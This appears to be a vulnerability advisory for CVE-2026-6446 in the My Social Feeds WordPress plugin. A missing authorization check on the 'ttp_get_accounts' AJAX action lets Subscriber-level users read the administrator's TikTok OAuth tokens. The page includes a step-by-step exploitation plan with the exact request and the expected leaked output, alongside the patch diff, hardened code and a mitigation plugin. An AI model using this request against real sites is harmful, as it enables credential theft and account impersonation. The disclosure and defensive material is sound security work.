CVE-2026-6446

My Social Feeds <= 1.0.4 - Missing Authorization to Unauthenticated Sensitive Information Exposure via 'ttp_get_accounts' AJAX Action

Severity: medium
Weakness: Insufficiently Protected Credentials
CVSS Score: 5.4
Patched in: 1.0.5
Time to patch: 1d

Description

The My Social Feeds – Social Feeds Embedder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to and including 1.0.4 via the 'ttp_get_accounts' AJAX action. This is due to the complete absence of authorization checks (no capability verification) and nonce verification in the get_accounts() function, which returns the full contents of the 'ttp_tiktok_accounts' WordPress option. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve sensitive TikTok OAuth credentials, including access_token and refresh_token values, that belong to administrator-connected TikTok accounts, enabling them to impersonate the site owner when interacting with the TikTok API.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.0.4
Published: May 1, 2026
Last updated: May 2, 2026
Affected plugin: my-social-feeds

What Changed in the Fix

Changes introduced in v1.0.5


Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan - CVE-2026-6446

1. Vulnerability Summary

The My Social Feeds plugin (up to version 1.0.4) contains a sensitive information exposure vulnerability via its AJAX handler for the ttp_get_accounts action. The get_accounts() function in the TTPTiktokAPI class lacks both capability checks (current_user_can) and nonce verification (check_ajax_referer). This allows any authenticated user, including those with Subscriber privileges, to retrieve the full contents of the ttp_tiktok_accounts WordPress option, which contains TikTok OAuth credentials (access_token, refresh_token, and open_id).

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: ttp_get_accounts
  • HTTP Method: POST or GET (AJAX actions typically support both, but POST is standard).
  • Authentication: Required (Subscriber level or higher).
  • Vulnerable Parameter: None (the action itself triggers the data dump).
  • Payload: action=ttp_get_accounts

3. Code Flow

  1. Entry Point: The plugin registers the AJAX action in includes/TiktokAPI.php:
    add_action('wp_ajax_ttp_get_accounts', [$this, 'get_accounts']);
    
    Note: There is no corresponding wp_ajax_nopriv_ttp_get_accounts, confirming authentication is required.
  2. Sink: The get_accounts() function (located in includes/TiktokAPI.php at approximately line 156) is called.
  3. Execution: In the vulnerable version (1.0.4), the function likely reads the option and returns it directly:
    public function get_accounts() {
        // Vulnerable version lacks: if (!current_user_can('manage_options')) return;
        // Vulnerable version lacks: check_ajax_referer('...', '...');
        $accounts = get_option('ttp_tiktok_accounts', []);
        wp_send_json_success($accounts);
    }
    
  4. Data Leak: The ttp_tiktok_accounts option stores an associative array where keys are TikTok open_ids and values include access_token and refresh_token.
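For comparison with the vulnerable flow above, here is the same handler with the two missing controls in place. This is an added example, not code from the My Social Feeds plugin or from this advisory, and it goes one step further than a bare capability check by also stripping the OAuth tokens from the response (the dashboard only needs display data). The class name TTPTiktokAPI_Hardened, the nonce action 'ttp_admin_nonce' and the '_ajax_nonce' request field are assumptions; the plugin's real nonce name would be whatever its localized admin script sends. The account field names follow the test data used later on this page.

```php
<?php
// Added example, not code from the plugin or the advisory: get_accounts() with the
// authorization and nonce checks the vulnerable version lacks, plus redaction of
// the OAuth tokens from the response. Assumptions: the class name
// TTPTiktokAPI_Hardened, the nonce action 'ttp_admin_nonce' and the '_ajax_nonce'
// request field are placeholders; the real nonce name is whatever the plugin's
// admin script sends.

class TTPTiktokAPI_Hardened {

    public function __construct() {
        // Same hook as the plugin; deliberately no wp_ajax_nopriv_ variant.
        add_action( 'wp_ajax_ttp_get_accounts', [ $this, 'get_accounts' ] );
    }

    public function get_accounts() {
        // CSRF check: dies with HTTP 403 and body -1 when the nonce is missing or stale.
        // The dashboard must send a nonce made with wp_create_nonce( 'ttp_admin_nonce' ).
        check_ajax_referer( 'ttp_admin_nonce', '_ajax_nonce' );

        // Authorization check: the option belongs to whoever manages the site, so
        // require manage_options rather than merely being logged in.
        if ( ! current_user_can( 'manage_options' ) ) {
            // wp_send_json_error() calls wp_die(), so execution stops here.
            wp_send_json_error( [ 'message' => 'Forbidden' ], 403 );
        }

        // Data minimisation: the browser needs display data, never the tokens.
        // Field names follow the test data in this advisory.
        $accounts = get_option( 'ttp_tiktok_accounts', [] );
        $public   = [];
        foreach ( (array) $accounts as $open_id => $account ) {
            $public[ $open_id ] = [
                'account_id'   => $account['account_id'] ?? $open_id,
                'display_name' => $account['display_name'] ?? '',
                'expires_at'   => (int) ( $account['expires_at'] ?? 0 ),
                'connected'    => ! empty( $account['access_token'] ),
            ];
        }

        wp_send_json_success( $public );
    }
}
```

Because the first statement dies on a bad or missing nonce, the plugin's admin script would have to include the nonce in every request; the research plan above notes that such a value would normally be produced in build/admin-dashboard.js and localized into the page. Keeping access_token and refresh_token server-side means that even an administrator's browser session, or a future authorization slip, no longer exposes the credentials themselves.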

4. Nonce Acquisition Strategy

According to the vulnerability description, the get_accounts() function completely lacks nonce verification. Therefore, no nonce is required to exploit this endpoint.

If testing reveals a nonce is required (i.e., the description was inaccurate), the nonce would typically be generated in build/admin-dashboard.js and localized. However, based on the PR:L (Privileges Required: Low) component of the CVSS vector and the "Missing Authorization" description, the exploit should succeed with just a valid Subscriber session.

5. Exploitation Strategy

Step-by-Step Plan:

  1. Authentication: Log in as a Subscriber-level user to obtain a session cookie.
  2. Execution: Send a POST request to admin-ajax.php with the action parameter set to ttp_get_accounts.
  3. Capture: Parse the JSON response to extract TikTok credentials.

Required HTTP Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Cookie: [Subscriber Cookies]

action=ttp_get_accounts

6. Test Data Setup

To verify the leak, mock data must exist in the database. Use WP-CLI to seed the sensitive option:

# Seed the TikTok accounts option with dummy sensitive data
wp option update ttp_tiktok_accounts '{
    "test_open_id_123": {
        "account_id": "test_open_id_123",
        "display_name": "Attacker Target",
        "access_token": "SENSITIVE_ACCESS_TOKEN_XYZ_999",
        "refresh_token": "SENSITIVE_REFRESH_TOKEN_ABC_111",
        "expires_at": 1999999999
    }
}' --format=json

7. Expected Results

A successful exploit will return a 200 OK response with a JSON body:

{
    "success": true,
    "data": {
        "test_open_id_123": {
            "account_id": "test_open_id_123",
            "display_name": "Attacker Target",
            "access_token": "SENSITIVE_ACCESS_TOKEN_XYZ_999",
            "refresh_token": "SENSITIVE_REFRESH_TOKEN_ABC_111",
            "expires_at": 1999999999
        }
    }
}

8. Verification Steps

  1. Observe Output: Verify the returned JSON contains the access_token and refresh_token seeded in Step 6.
  2. Access Control Check: Attempt the same request without a session cookie to confirm that admin-ajax.php rejects unauthenticated requests for this action, since no wp_ajax_nopriv_ hook exists (WordPress responds with HTTP 400 and a body of 0).
  3. Privilege Check: Confirm the user used for exploitation has only the subscriber role:
    wp user get <username> --field=roles
    

9. Alternative Approaches

If the ttp_get_accounts endpoint is somehow blocked, examine ttp_tiktok_videos (registered for nopriv):

add_action('wp_ajax_ttp_tiktok_videos', [$this, 'get_videos']);
add_action('wp_ajax_nopriv_ttp_tiktok_videos', [$this, 'get_videos']);

Check if get_videos leaks the account info in its response or through error messages if an invalid open_id is provided. However, get_accounts is the primary and direct target for this CVE.

Research Findings
Static analysis — not yet PoC-verified

Summary

The My Social Feeds plugin for WordPress is vulnerable to sensitive information exposure due to a missing authorization check on its 'ttp_get_accounts' AJAX action. Authenticated attackers, including those with Subscriber-level privileges, can exploit this to retrieve sensitive TikTok OAuth tokens (access and refresh tokens) stored in the WordPress options table.

Vulnerable Code

// includes/TiktokAPI.php

// Line 25
add_action('wp_ajax_ttp_get_accounts', [$this, 'get_accounts']);

// ...

// Line 156
public function get_accounts() {
    $accounts = get_option('ttp_tiktok_accounts', []);
    wp_send_json_success($accounts);
}

Security Fix

--- includes/TiktokAPI.php
+++ includes/TiktokAPI.php
@@ -156,5 +156,8 @@
 
     public function get_accounts() {
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( 'Unauthorized' );
+        }
         $accounts = get_option('ttp_tiktok_accounts', []);
         wp_send_json_success($accounts);
     }
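Review bot: the capability check added at the top of get_accounts() closes the authorization gap, but the hunk adds no nonce verification, which the research plan on this page lists as the second missing control; add `check_ajax_referer( '<nonce-action>', '_ajax_nonce' );` (using the nonce name the plugin's admin script localizes) beside the capability check. For a read-only endpoint this is mostly defence in depth, since a cross-origin page cannot read the JSON response, but it is the WordPress convention for privileged AJAX handlers. Two smaller points: `wp_send_json_error( 'Unauthorized' )` sends HTTP 200 by default, so pass a status such as `wp_send_json_error( 'Unauthorized', 403 )` to make rejections visible in access logs; and the success path still returns access_token and refresh_token verbatim to any administrator's browser, so consider returning only display fields and keeping the tokens server-side.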

Exploit Outline

To exploit this vulnerability, an attacker needs a valid login session on the WordPress site (Subscriber level or higher). The attacker sends a request to the /wp-admin/admin-ajax.php endpoint with the action parameter set to 'ttp_get_accounts'. Because the plugin fails to verify user capabilities or nonces for this action, it returns the full contents of the 'ttp_tiktok_accounts' option, which includes sensitive TikTok OAuth credentials (access_token, refresh_token, and open_id) belonging to the site administrator.
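For sites that cannot move to 1.0.5 right away, the same hook can be used to block and log the exposure at site level. The must-use plugin below is an added example, not part of My Social Feeds or of this advisory; it assumes that no wp_ajax_nopriv_ handler exists for the action (as the advisory states) and that the PHP error log is an acceptable audit destination. Function and file names are placeholders.

```php
<?php
/**
 * Plugin Name: CVE-2026-6446 interim guard (added example, not part of My Social Feeds)
 *
 * Site-level mitigation for installs that cannot move to 1.0.5 immediately: save
 * this file in wp-content/mu-plugins/ and it loads before regular plugins.
 * It hooks the same wp_ajax_ttp_get_accounts action at priority 0, so it runs
 * before the plugin's own callback (registered at the default priority 10) and
 * ends the request for any user without manage_options. Assumptions: no
 * wp_ajax_nopriv_ handler exists for this action (as the advisory states), and
 * the site's PHP error log is the desired audit destination.
 */

function cve_2026_6446_guard_ttp_get_accounts() {
    if ( current_user_can( 'manage_options' ) ) {
        return; // administrators fall through to the plugin's own handler
    }

    $user = wp_get_current_user();
    $ip   = isset( $_SERVER['REMOTE_ADDR'] )
        ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) )
        : 'unknown';

    // Audit trail: a non-administrator reaching this action has no legitimate reason to.
    error_log( sprintf(
        'CVE-2026-6446 guard: blocked ttp_get_accounts for user #%d (roles: %s) from %s',
        $user->ID,
        implode( ',', (array) $user->roles ),
        $ip
    ) );

    // wp_send_json_error() ends the request via wp_die(), so the plugin callback never runs.
    wp_send_json_error( [ 'message' => 'Forbidden' ], 403 );
}
add_action( 'wp_ajax_ttp_get_accounts', 'cve_2026_6446_guard_ttp_get_accounts', 0 );
```

Remove the file once the plugin is on 1.0.5 or later. Any guard log line, or other evidence that a non-administrator reached the action before the patch, means the stored access_token and refresh_token values should be treated as exposed: disconnect and reconnect the affected TikTok accounts so fresh tokens replace the ones in the ttp_tiktok_accounts option.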
